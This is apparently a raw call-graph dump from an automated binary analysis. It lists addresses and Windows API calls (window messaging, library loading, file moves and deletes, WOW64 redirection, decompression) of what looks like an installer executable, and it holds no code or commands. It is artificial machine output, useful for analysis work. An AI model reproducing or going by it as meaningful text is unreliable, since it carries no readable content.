52736->52735 52770 402660 52736->52770 52737->52736 52740 4085d8 52739->52740 52740->52683 52760 4034bc 52755->52760 52757 4034f0 52758 403400 4 API calls 52757->52758 52759 403508 52758->52759 52759->52732 52761 4034c0 52760->52761 52762 4034dc 52760->52762 52765 402648 52761->52765 52762->52757 52764 4034c9 52764->52757 52766 40264c 52765->52766 52767 402656 52765->52767 52766->52767 52769 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52766->52769 52767->52764 52767->52767 52769->52767 52771 402664 52770->52771 52772 40266e 52770->52772 52771->52772 52774 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52771->52774 52772->52735 52772->52772 52774->52772 52775->52622 52784 423608 SystemParametersInfoA 52776->52784 52779 423675 ShowWindow 52781 423680 52779->52781 52782 423687 52779->52782 52787 423638 SystemParametersInfoA 52781->52787 52782->52637 52785 423626 52784->52785 52785->52779 52786 423638 SystemParametersInfoA 52785->52786 52786->52779 52787->52782 52791 41db64 52788->52791 52792 41db4a 52791->52792 52793 41db71 52791->52793 52792->52648 52792->52649 52793->52792 52800 40cc80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 52793->52800 52795 41db8e 52795->52792 52796 41dba8 52795->52796 52797 41db9b 52795->52797 52801 41bd9c 11 API calls 52796->52801 52802 41b398 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 52797->52802 52800->52795 52801->52792 52802->52792 52804 423a4d GetWindowLongA 52803->52804 52805 423a59 52803->52805 52804->52805 52806 490c98 52807 490ccc 52806->52807 52808 490cce 52807->52808 52809 490ce2 52807->52809 52952 4467f0 18 API calls 52808->52952 52812 490d1e 52809->52812 52813 490cf1 52809->52813 52811 490cd7 Sleep 52869 490d55 52811->52869 52818 490d5a 52812->52818 52819 490d2d 52812->52819 52814 44684c 18 API calls 52813->52814 52817 490d00 52814->52817 52820 490d08 FindWindowA 52817->52820 52824 490d69 52818->52824 52825 490db0 52818->52825 52942 44684c 52819->52942 52823 446acc 5 API calls 52820->52823 52822 490d3a 52826 490d42 FindWindowA 52822->52826 52861 490d19 52823->52861 52953 4467f0 18 API calls 52824->52953 52830 490e0c 52825->52830 52831 490dbf 52825->52831 52946 446acc 52826->52946 52829 490d75 52954 4467f0 18 API calls 52829->52954 52837 490e68 52830->52837 52838 490e1b 52830->52838 52957 4467f0 18 API calls 52831->52957 52834 490d82 52955 4467f0 18 API calls 52834->52955 52835 490dcb 52958 4467f0 18 API calls 52835->52958 52848 490ea2 52837->52848 52849 490e77 52837->52849 52962 4467f0 18 API calls 52838->52962 52840 490d8f 52956 4467f0 18 API calls 52840->52956 52842 490dd8 52959 4467f0 18 API calls 52842->52959 52844 490d9a SendMessageA 52847 446acc 5 API calls 52844->52847 52845 490e27 52963 4467f0 18 API calls 52845->52963 52847->52861 52859 490eb1 52848->52859 52863 490ef0 52848->52863 52852 44684c 18 API calls 52849->52852 52851 490de5 52960 4467f0 18 API calls 52851->52960 52855 490e84 52852->52855 52853 490e34 52964 4467f0 18 API calls 52853->52964 52862 490e8c RegisterClipboardFormatA 52855->52862 52857 490df0 PostMessageA 52961 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52857->52961 52858 490e41 52965 4467f0 18 API calls 52858->52965 52967 4467f0 18 API calls 52859->52967 52861->52869 52866 446acc 5 API calls 52862->52866 52870 490eff 52863->52870 52871 490f44 52863->52871 52866->52869 52867 490e4c SendNotifyMessageA 52966 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52867->52966 52868 490ebd 52968 4467f0 18 API calls 52868->52968 52992 403420 52869->52992 52970 4467f0 18 API calls 52870->52970 52879 490f98 52871->52879 52880 490f53 52871->52880 52874 490eca 52969 4467f0 18 API calls 52874->52969 52877 490f0b 52971 4467f0 18 API calls 52877->52971 52878 490ed5 SendMessageA 52882 446acc 5 API calls 52878->52882 52887 490ffa 52879->52887 52888 490fa7 52879->52888 52974 4467f0 18 API calls 52880->52974 52882->52861 52884 490f18 52972 4467f0 18 API calls 52884->52972 52885 490f5f 52975 4467f0 18 API calls 52885->52975 52896 491009 52887->52896 52897 491081 52887->52897 52891 44684c 18 API calls 52888->52891 52890 490f23 PostMessageA 52973 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52890->52973 52894 490fb4 52891->52894 52892 490f6c 52976 4467f0 18 API calls 52892->52976 52978 42e2bc SetErrorMode 52894->52978 52900 44684c 18 API calls 52896->52900 52907 491090 52897->52907 52908 4910b6 52897->52908 52899 490f77 SendNotifyMessageA 52977 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52899->52977 52903 491018 52900->52903 52901 490fc1 52904 490fd7 GetLastError 52901->52904 52905 490fc7 52901->52905 52981 4467f0 18 API calls 52903->52981 52909 446acc 5 API calls 52904->52909 52906 446acc 5 API calls 52905->52906 52910 490fd5 52906->52910 52986 4467f0 18 API calls 52907->52986 52915 4910e8 52908->52915 52916 4910c5 52908->52916 52909->52910 52914 446acc 5 API calls 52910->52914 52913 49109a FreeLibrary 52987 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52913->52987 52914->52869 52925 4910f7 52915->52925 52931 49112b 52915->52931 52919 44684c 18 API calls 52916->52919 52917 49102b GetProcAddress 52920 491071 52917->52920 52921 491037 52917->52921 52922 4910d1 52919->52922 52985 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52920->52985 52982 4467f0 18 API calls 52921->52982 52927 4910d9 CreateMutexA 52922->52927 52988 48ae84 18 API calls 52925->52988 52926 491043 52983 4467f0 18 API calls 52926->52983 52927->52869 52930 491050 52934 446acc 5 API calls 52930->52934 52931->52869 52990 48ae84 18 API calls 52931->52990 52933 491103 52935 491114 OemToCharBuffA 52933->52935 52936 491061 52934->52936 52989 48ae9c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52935->52989 52984 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52936->52984 52939 491146 52940 491157 CharToOemBuffA 52939->52940 52991 48ae9c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52940->52991 52943 446854 52942->52943 52996 4358cc 52943->52996 52945 446873 52945->52822 52947 446ad4 52946->52947 53022 435c34 VariantClear 52947->53022 52949 446af7 52951 446b0e 52949->52951 53023 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52949->53023 52951->52869 52952->52811 52953->52829 52954->52834 52955->52840 52956->52844 52957->52835 52958->52842 52959->52851 52960->52857 52961->52861 52962->52845 52963->52853 52964->52858 52965->52867 52966->52869 52967->52868 52968->52874 52969->52878 52970->52877 52971->52884 52972->52890 52973->52861 52974->52885 52975->52892 52976->52899 52977->52869 53024 403738 52978->53024 52981->52917 52982->52926 52983->52930 52984->52861 52985->52861 52986->52913 52987->52869 52988->52933 52989->52869 52990->52939 52991->52869 52994 403426 52992->52994 52993 40344b 52994->52993 52995 402660 4 API calls 52994->52995 52995->52994 52997 4358d8 52996->52997 52998 4358fa 52996->52998 52997->52998 53016 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52997->53016 52999 43597d 52998->52999 53001 435941 52998->53001 53002 435971 52998->53002 53003 435965 52998->53003 53004 435959 52998->53004 53005 43594d 52998->53005 53021 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52999->53021 53017 403510 53001->53017 53020 4040e8 18 API calls 53002->53020 53007 403494 4 API calls 53003->53007 53004->52945 53011 403510 4 API calls 53005->53011 53013 43596e 53007->53013 53010 43598e 53010->52945 53012 435956 53011->53012 53012->52945 53013->52945 53014 43597a 53014->52945 53016->52998 53018 4034e0 4 API calls 53017->53018 53019 40351d 53018->53019 53019->52945 53020->53014 53021->53010 53022->52949 53023->52951 53025 40373c LoadLibraryA 53024->53025 53025->52901 53026 416b52 53027 416bfa 53026->53027 53028 416b6a 53026->53028 53045 41532c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53027->53045 53029 416b84 SendMessageA 53028->53029 53030 416b78 53028->53030 53041 416bd8 53029->53041 53032 416b82 CallWindowProcA 53030->53032 53033 416b9e 53030->53033 53032->53041 53042 41a068 GetSysColor 53033->53042 53036 416ba9 SetTextColor 53037 416bbe 53036->53037 53043 41a068 GetSysColor 53037->53043 53039 416bc3 SetBkColor 53044 41a6f0 GetSysColor CreateBrushIndirect 53039->53044 53042->53036 53043->53039 53044->53041 53045->53041 53046 416654 53047 416661 53046->53047 53048 4166bb 53046->53048 53053 416560 CreateWindowExA 53047->53053 53049 416668 SetPropA SetPropA 53049->53048 53050 41669b 53049->53050 53051 4166ae SetWindowPos 53050->53051 53051->53048 53053->53049 53054 42e317 SetErrorMode 53055 42f394 53056 42f3a3 NtdllDefWindowProc_A 53055->53056 53057 42f39f 53055->53057 53056->53057 53058 4162da 53059 416306 53058->53059 53060 4162e6 GetClassInfoA 53058->53060 53060->53059 53061 4162fa GetClassInfoA 53060->53061 53061->53059 53062 48fed4 53063 48ff0e 53062->53063 53064 48ff1a 53063->53064 53065 48ff10 53063->53065 53067 48ff29 53064->53067 53068 48ff52 53064->53068 53257 4090a0 MessageBeep 53065->53257 53070 44684c 18 API calls 53067->53070 53075 48ff8a 53068->53075 53076 48ff61 53068->53076 53069 403420 4 API calls 53071 490566 53069->53071 53072 48ff36 53070->53072 53073 403400 4 API calls 53071->53073 53258 406bb8 53072->53258 53078 49056e 53073->53078 53083 48ff99 53075->53083 53084 48ffc2 53075->53084 53077 44684c 18 API calls 53076->53077 53080 48ff6e 53077->53080 53266 406c08 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53080->53266 53086 44684c 18 API calls 53083->53086 53089 48ffea 53084->53089 53090 48ffd1 53084->53090 53085 48ff79 53267 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53085->53267 53088 48ffa6 53086->53088 53268 406c3c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53088->53268 53097 48fff9 53089->53097 53098 49001e 53089->53098 53270 407288 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 53090->53270 53093 48ffb1 53269 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53093->53269 53094 48ffd9 53271 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53094->53271 53099 44684c 18 API calls 53097->53099 53101 49002d 53098->53101 53102 490056 53098->53102 53100 490006 53099->53100 53272 4072b0 53100->53272 53104 44684c 18 API calls 53101->53104 53109 49008e 53102->53109 53110 490065 53102->53110 53107 49003a 53104->53107 53105 49000e 53275 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53105->53275 53276 42c7d0 53107->53276 53116 49009d 53109->53116 53120 4900da 53109->53120 53111 44684c 18 API calls 53110->53111 53113 490072 53111->53113 53286 407200 8 API calls 53113->53286 53118 44684c 18 API calls 53116->53118 53117 49007d 53287 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53117->53287 53121 4900ac 53118->53121 53123 4900e9 53120->53123 53124 490112 53120->53124 53125 44684c 18 API calls 53121->53125 53122 48ff15 53122->53069 53126 44684c 18 API calls 53123->53126 53131 49014a 53124->53131 53132 490121 53124->53132 53127 4900bd 53125->53127 53128 4900f6 53126->53128 53288 48fbd8 8 API calls 53127->53288 53290 42c870 53128->53290 53140 490159 53131->53140 53141 490182 53131->53141 53134 44684c 18 API calls 53132->53134 53133 4900c9 53289 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53133->53289 53137 49012e 53134->53137 53296 42c898 53137->53296 53143 44684c 18 API calls 53140->53143 53146 4901ba 53141->53146 53147 490191 53141->53147 53145 490166 53143->53145 53305 42c8c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 53145->53305 53154 4901c9 53146->53154 53155 4901f2 53146->53155 53149 44684c 18 API calls 53147->53149 53151 49019e 53149->53151 53150 490171 53306 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53150->53306 53307 42c8f8 53151->53307 53157 44684c 18 API calls 53154->53157 53161 49023e 53155->53161 53162 490201 53155->53162 53159 4901d6 53157->53159 53313 42c920 53159->53313 53167 49024d 53161->53167 53168 490290 53161->53168 53164 44684c 18 API calls 53162->53164 53166 490210 53164->53166 53169 44684c 18 API calls 53166->53169 53170 44684c 18 API calls 53167->53170 53176 49029f 53168->53176 53177 490303 53168->53177 53171 490221 53169->53171 53172 490260 53170->53172 53319 42c4c4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 53171->53319 53174 44684c 18 API calls 53172->53174 53179 490271 53174->53179 53175 49022d 53320 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53175->53320 53178 44684c 18 API calls 53176->53178 53183 490342 53177->53183 53184 490312 53177->53184 53181 4902ac 53178->53181 53321 48fdd0 12 API calls 53179->53321 53249 42c5d4 7 API calls 53181->53249 53195 490381 53183->53195 53196 490351 53183->53196 53187 44684c 18 API calls 53184->53187 53186 49027f 53322 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53186->53322 53190 49031f 53187->53190 53188 4902ba 53191 4902be 53188->53191 53192 4902f3 53188->53192 53325 451f68 53190->53325 53194 44684c 18 API calls 53191->53194 53324 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53192->53324 53199 4902cd 53194->53199 53204 4903c0 53195->53204 53205 490390 53195->53205 53200 44684c 18 API calls 53196->53200 53198 49032c 53332 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53198->53332 53250 4522e0 53199->53250 53203 49035e 53200->53203 53333 451dd0 53203->53333 53214 490408 53204->53214 53215 4903cf 53204->53215 53208 44684c 18 API calls 53205->53208 53206 4902dd 53323 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53206->53323 53212 49039d 53208->53212 53210 49036b 53340 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53210->53340 53341 452470 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 53212->53341 53221 490450 53214->53221 53222 490417 53214->53222 53216 44684c 18 API calls 53215->53216 53218 4903de 53216->53218 53217 4903aa 53342 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53217->53342 53220 44684c 18 API calls 53218->53220 53223 4903ef 53220->53223 53226 490463 53221->53226 53233 490519 53221->53233 53224 44684c 18 API calls 53222->53224 53228 446acc 5 API calls 53223->53228 53225 490426 53224->53225 53227 44684c 18 API calls 53225->53227 53229 44684c 18 API calls 53226->53229 53230 490437 53227->53230 53228->53122 53231 490490 53229->53231 53234 446acc 5 API calls 53230->53234 53232 44684c 18 API calls 53231->53232 53235 4904a7 53232->53235 53233->53122 53346 4467f0 18 API calls 53233->53346 53234->53122 53343 407de4 7 API calls 53235->53343 53237 490532 53347 42e73c FormatMessageA 53237->53347 53242 4904c9 53243 44684c 18 API calls 53242->53243 53244 4904dd 53243->53244 53344 408510 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53244->53344 53246 4904e8 53345 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53246->53345 53248 4904f4 53249->53188 53352 451d84 53250->53352 53252 4522fd 53252->53206 53253 4522f9 53253->53252 53254 452321 MoveFileA GetLastError 53253->53254 53358 451dc0 53254->53358 53257->53122 53259 406bc7 53258->53259 53260 406be0 53259->53260 53261 406be9 53259->53261 53262 403400 4 API calls 53260->53262 53361 403778 53261->53361 53263 406be7 53262->53263 53265 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53263->53265 53265->53122 53266->53085 53267->53122 53268->53093 53269->53122 53270->53094 53271->53122 53273 403738 53272->53273 53274 4072ba SetCurrentDirectoryA 53273->53274 53274->53105 53275->53122 53277 403738 53276->53277 53278 42c7f3 GetFullPathNameA 53277->53278 53279 42c816 53278->53279 53280 42c7ff 53278->53280 53281 403494 4 API calls 53279->53281 53280->53279 53282 42c807 53280->53282 53283 42c814 53281->53283 53284 4034e0 4 API calls 53282->53284 53285 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53283->53285 53284->53283 53285->53122 53286->53117 53287->53122 53288->53133 53289->53122 53368 42c768 53290->53368 53293 403778 4 API calls 53294 42c891 53293->53294 53295 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53294->53295 53295->53122 53383 42c640 53296->53383 53299 42c8b5 53302 403778 4 API calls 53299->53302 53300 42c8ac 53301 403400 4 API calls 53300->53301 53303 42c8b3 53301->53303 53302->53303 53304 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53303->53304 53304->53122 53305->53150 53306->53122 53308 42c768 IsDBCSLeadByte 53307->53308 53309 42c908 53308->53309 53310 403778 4 API calls 53309->53310 53311 42c91a 53310->53311 53312 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53311->53312 53312->53122 53314 42c768 IsDBCSLeadByte 53313->53314 53315 42c930 53314->53315 53316 403778 4 API calls 53315->53316 53317 42c941 53316->53317 53318 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53317->53318 53318->53122 53319->53175 53320->53122 53321->53186 53322->53122 53323->53122 53324->53122 53326 451d84 2 API calls 53325->53326 53327 451f7e 53326->53327 53328 451f82 53327->53328 53329 451f9e DeleteFileA GetLastError 53327->53329 53328->53198 53330 451dc0 Wow64RevertWow64FsRedirection 53329->53330 53331 451fc4 53330->53331 53331->53198 53332->53122 53334 451d84 2 API calls 53333->53334 53335 451de6 53334->53335 53336 451dea 53335->53336 53337 451e08 CreateDirectoryA GetLastError 53335->53337 53336->53210 53338 451dc0 Wow64RevertWow64FsRedirection 53337->53338 53339 451e2e 53338->53339 53339->53210 53340->53122 53341->53217 53342->53122 53343->53242 53344->53246 53345->53248 53346->53237 53348 42e762 53347->53348 53349 4034e0 4 API calls 53348->53349 53350 42e77f 53349->53350 53351 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53350->53351 53351->53122 53353 451d92 53352->53353 53354 451d8e 53352->53354 53355 451db4 SetLastError 53353->53355 53356 451d9b Wow64DisableWow64FsRedirection 53353->53356 53354->53253 53357 451daf 53355->53357 53356->53357 53357->53253 53359 451dc5 Wow64RevertWow64FsRedirection 53358->53359 53360 451dcf 53358->53360 53359->53360 53360->53206 53362 4037aa 53361->53362 53363 40377d 53361->53363 53364 403400 4 API calls 53362->53364 53363->53362 53365 403791 53363->53365 53367 4037a0 53364->53367 53366 4034e0 4 API calls 53365->53366 53366->53367 53367->53263 53373 42c648 53368->53373 53370 42c7c7 53370->53293 53371 42c77d 53371->53370 53380 42c454 IsDBCSLeadByte 53371->53380 53376 42c659 53373->53376 53374 42c6bd 53377 42c6b8 53374->53377 53382 42c454 IsDBCSLeadByte 53374->53382 53376->53374 53379 42c677 53376->53379 53377->53371 53379->53377 53381 42c454 IsDBCSLeadByte 53379->53381 53380->53371 53381->53379 53382->53377 53384 42c648 IsDBCSLeadByte 53383->53384 53385 42c647 53384->53385 53385->53299 53385->53300 53386 46ad18 53387 46ad4e 53386->53387 53421 46b037 53386->53421 53388 46ad8a 53387->53388 53391 46add4 53387->53391 53392 46ade5 53387->53392 53393 46adb2 53387->53393 53394 46adc3 53387->53394 53395 46ada1 53387->53395 53388->53421 53481 4683b4 53388->53481 53389 403400 4 API calls 53396 46b071 53389->53396 53662 46aa98 67 API calls 53391->53662 53663 46aca8 45 API calls 53392->53663 53661 46a790 42 API calls 53393->53661 53446 46a8d8 53394->53446 53426 46a628 53395->53426 53397 403400 4 API calls 53396->53397 53403 46b079 53397->53403 53404 46ae1e 53415 46ae60 53404->53415 53404->53421 53664 493200 53404->53664 53407 46af71 53683 481938 123 API calls 53407->53683 53410 46af84 53410->53421 53411 42cb8c 6 API calls 53411->53415 53413 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53413->53415 53415->53407 53415->53411 53415->53413 53418 414af8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53415->53418 53419 46b01a 53415->53419 53420 46afd8 53415->53420 53415->53421 53484 4682f0 53415->53484 53492 469f08 53415->53492 53499 469640 53415->53499 53552 469fe8 53415->53552 53590 48146c 53415->53590 53692 46a3e4 19 API calls 53415->53692 53418->53415 53422 469fe8 23 API calls 53419->53422 53684 457114 53420->53684 53421->53389 53422->53421 53425 457114 24 API calls 53425->53419 53693 414af8 53426->53693 53428 46a69b 53430 46a6a1 53428->53430 53431 46a6d8 53428->53431 53429 46a65a 53429->53428 53435 493200 18 API calls 53429->53435 53432 46a6c3 53430->53432 53697 46c45c 53430->53697 53433 46a6e4 GetCursor LoadCursorA SetCursor Sleep SetCursor 53431->53433 53434 46a70d 53431->53434 53701 414b28 53432->53701 53433->53434 53706 47d508 42 API calls 53434->53706 53435->53428 53440 403450 4 API calls 53440->53432 53441 46a721 53443 414b28 4 API calls 53441->53443 53445 46a6d6 53441->53445 53442 403400 4 API calls 53444 46a766 53442->53444 53443->53445 53444->53388 53445->53442 53719 46b4a8 53446->53719 53449 46aa5a 53451 403420 4 API calls 53449->53451 53450 414af8 4 API calls 53452 46a926 53450->53452 53453 46aa74 53451->53453 53454 46aa46 53452->53454 53722 4554a0 13 API calls 53452->53722 53455 403400 4 API calls 53453->53455 53454->53449 53457 403450 4 API calls 53454->53457 53458 46aa7c 53455->53458 53457->53449 53459 403400 4 API calls 53458->53459 53460 46aa84 53459->53460 53460->53388 53461 46aa09 53461->53449 53461->53454 53466 42cd14 7 API calls 53461->53466 53463 46a9a9 53463->53449 53463->53461 53732 42cd14 53463->53732 53465 46a944 53465->53463 53723 465d14 53465->53723 53468 46aa1f 53466->53468 53468->53454 53473 450ab8 4 API calls 53468->53473 53472 465d14 19 API calls 53475 46a984 53472->53475 53476 46aa36 53473->53476 53727 450a88 53475->53727 53739 47d508 42 API calls 53476->53739 53482 4682f0 19 API calls 53481->53482 53483 4683c3 53482->53483 53483->53404 53487 46831f 53484->53487 53485 4078fc 19 API calls 53486 468358 53485->53486 53958 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53486->53958 53487->53485 53489 468360 53487->53489 53490 403400 4 API calls 53489->53490 53491 468378 53490->53491 53491->53415 53493 469f14 53492->53493 53494 469f19 53492->53494 53495 469f17 53493->53495 53959 469974 53493->53959 54044 4691c0 46 API calls 53494->54044 53495->53415 53497 469f21 53497->53415 53500 403400 4 API calls 53499->53500 53501 46966d 53500->53501 54394 47c564 53501->54394 53503 469692 53504 469696 53503->53504 53505 4696ac 53503->53505 54412 465f14 53504->54412 53507 4696a0 53505->53507 54415 4930f0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53505->54415 53510 469771 53507->53510 53511 4697dc 53507->53511 53551 4698a5 53507->53551 53509 403420 4 API calls 53513 4698e1 53509->53513 53514 403494 4 API calls 53510->53514 53515 403494 4 API calls 53511->53515 53512 4696c8 53512->53507 53516 4696d0 53512->53516 53513->53415 53517 46977e 53514->53517 53518 4697e9 53515->53518 53519 469fe8 23 API calls 53516->53519 53520 40357c 4 API calls 53517->53520 53521 40357c 4 API calls 53518->53521 53522 4696dd 53519->53522 53523 46978b 53520->53523 53524 4697f6 53521->53524 54416 42f3d4 53522->54416 53526 40357c 4 API calls 53523->53526 53527 40357c 4 API calls 53524->53527 53529 469798 53526->53529 53530 469803 53527->53530 53533 40357c 4 API calls 53529->53533 53534 40357c 4 API calls 53530->53534 53532 469724 53532->53415 53535 4697a5 53533->53535 53536 469810 53534->53536 53537 465f14 20 API calls 53535->53537 53538 40357c 4 API calls 53536->53538 53540 4697b3 53537->53540 53539 46981e 53538->53539 53542 414b28 4 API calls 53539->53542 53541 40357c 4 API calls 53540->53541 53543 4697bc 53541->53543 53544 4697da 53542->53544 53545 40357c 4 API calls 53543->53545 54433 46624c 53544->54433 53547 4697c9 53545->53547 53548 414b28 4 API calls 53547->53548 53548->53544 53551->53509 53553 4682f0 19 API calls 53552->53553 53555 46a000 53553->53555 53554 46a034 54595 4649f4 53554->54595 53555->53554 53557 4649f4 7 API calls 53555->53557 53557->53554 53560 46a04c 53562 46a09a 53560->53562 53576 46a133 53560->53576 54616 469f9c 19 API calls 53560->54616 53563 4682f0 19 API calls 53562->53563 53563->53576 53564 46a1f2 GetSystemMenu EnableMenuItem 53565 414b28 4 API calls 53564->53565 53566 46a212 53565->53566 53567 46a21e 53566->53567 53568 46a248 53566->53568 53569 414b28 4 API calls 53567->53569 53571 46a264 53568->53571 53572 46a28e 53568->53572 53570 46a232 53569->53570 53574 414b28 4 API calls 53570->53574 53575 414b28 4 API calls 53571->53575 53573 414b28 4 API calls 53572->53573 53577 46a2a2 53573->53577 53578 46a246 53574->53578 53579 46a278 53575->53579 53576->53564 53580 414b28 4 API calls 53577->53580 54612 469f30 53578->54612 53581 414b28 4 API calls 53579->53581 53580->53578 53581->53578 53585 4683b4 19 API calls 53587 46a340 53585->53587 53586 46a2e0 53586->53585 53588 46a3a3 53587->53588 54618 49314c 18 API calls 53587->54618 53588->53415 53591 46b4a8 47 API calls 53590->53591 53592 4814af 53591->53592 53593 4814b8 53592->53593 54818 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53592->54818 53595 414af8 4 API calls 53593->53595 53596 4814c8 53595->53596 53597 403450 4 API calls 53596->53597 53598 4814d5 53597->53598 54638 46b7b8 53598->54638 53601 4814e5 53603 414af8 4 API calls 53601->53603 53604 4814f5 53603->53604 53605 403450 4 API calls 53604->53605 53606 481502 53605->53606 53607 468fa8 SendMessageA 53606->53607 53608 48151b 53607->53608 53609 481559 53608->53609 54820 478a14 23 API calls 53608->54820 53611 4241ec 11 API calls 53609->53611 53612 481563 53611->53612 53613 481589 53612->53613 53614 481574 SetActiveWindow 53612->53614 54667 480a68 53613->54667 53614->53613 53661->53388 53662->53388 53663->53388 56538 43d21c 53664->56538 53667 49322c 56543 431424 53667->56543 53668 4932b2 53669 4932c1 53668->53669 56576 492a28 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53668->56576 53669->53415 53678 493276 56574 492abc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53678->56574 53680 49328a 56575 433624 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53680->56575 53682 4932aa 53682->53415 53683->53410 53685 457139 53684->53685 53686 457159 53685->53686 53687 4078fc 19 API calls 53685->53687 53689 403400 4 API calls 53686->53689 53688 457151 53687->53688 53690 456f08 24 API calls 53688->53690 53691 45716e 53689->53691 53690->53686 53691->53425 53692->53415 53694 414b06 53693->53694 53695 4034e0 4 API calls 53694->53695 53696 414b13 53695->53696 53696->53429 53698 46a6b6 53697->53698 53699 46c465 53697->53699 53698->53440 53707 46c53c 53699->53707 53702 414af8 4 API calls 53701->53702 53703 414b4c 53702->53703 53704 403400 4 API calls 53703->53704 53705 414b7d 53704->53705 53705->53445 53706->53441 53708 46c543 53707->53708 53711 45cf00 53708->53711 53712 45cf0b 53711->53712 53713 45cf26 VirtualAlloc 53712->53713 53714 45cf45 53713->53714 53715 45cf4a BZ2_bzDecompressInit 53713->53715 53714->53715 53718 45ce5c 19 API calls 53715->53718 53717 45cf8f 53717->53698 53718->53717 53740 46b534 53719->53740 53722->53465 53724 465d2e 53723->53724 53909 4078fc 53724->53909 53728 450aa8 53727->53728 53928 450960 53728->53928 53952 42cc98 53732->53952 53735 450ab8 53736 450a88 4 API calls 53735->53736 53737 450ad4 53736->53737 53738 47d508 42 API calls 53737->53738 53738->53461 53739->53454 53741 414af8 4 API calls 53740->53741 53742 46b566 53741->53742 53794 465fac 53742->53794 53745 414b28 4 API calls 53746 46b578 53745->53746 53747 46b587 53746->53747 53749 46b5a0 53746->53749 53843 47d508 42 API calls 53747->53843 53751 46b5e7 53749->53751 53753 46b5ce 53749->53753 53750 403420 4 API calls 53752 46a90a 53750->53752 53754 46b64c 53751->53754 53767 46b5eb 53751->53767 53752->53449 53752->53450 53844 47d508 42 API calls 53753->53844 53846 42cb18 CharNextA 53754->53846 53757 46b65b 53758 46b65f 53757->53758 53761 46b678 53757->53761 53847 47d508 42 API calls 53758->53847 53760 46b633 53845 47d508 42 API calls 53760->53845 53762 46b69c 53761->53762 53803 46611c 53761->53803 53848 47d508 42 API calls 53762->53848 53767->53760 53767->53761 53770 46b6b5 53771 403778 4 API calls 53770->53771 53772 46b6cb 53771->53772 53811 42c968 53772->53811 53775 46b6dc 53849 4661a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53775->53849 53776 46b70a 53778 42c898 5 API calls 53776->53778 53780 46b715 53778->53780 53779 46b6ef 53781 450ab8 4 API calls 53779->53781 53815 42c40c 53780->53815 53784 46b6fc 53781->53784 53783 46b720 53825 42cb8c 53783->53825 53850 47d508 42 API calls 53784->53850 53792 46b59b 53792->53750 53798 465fc6 53794->53798 53795 406bb8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53795->53798 53797 42cb8c 6 API calls 53797->53798 53798->53795 53798->53797 53799 403450 4 API calls 53798->53799 53800 46600f 53798->53800 53852 42ca78 53798->53852 53799->53798 53801 403420 4 API calls 53800->53801 53802 466029 53801->53802 53802->53745 53804 466126 53803->53804 53805 466139 53804->53805 53882 42cb08 CharNextA 53804->53882 53805->53762 53807 46614c 53805->53807 53809 466156 53807->53809 53808 466183 53808->53762 53808->53770 53809->53808 53883 42cb08 CharNextA 53809->53883 53812 42c9c1 53811->53812 53813 42c97e 53811->53813 53812->53775 53812->53776 53813->53812 53884 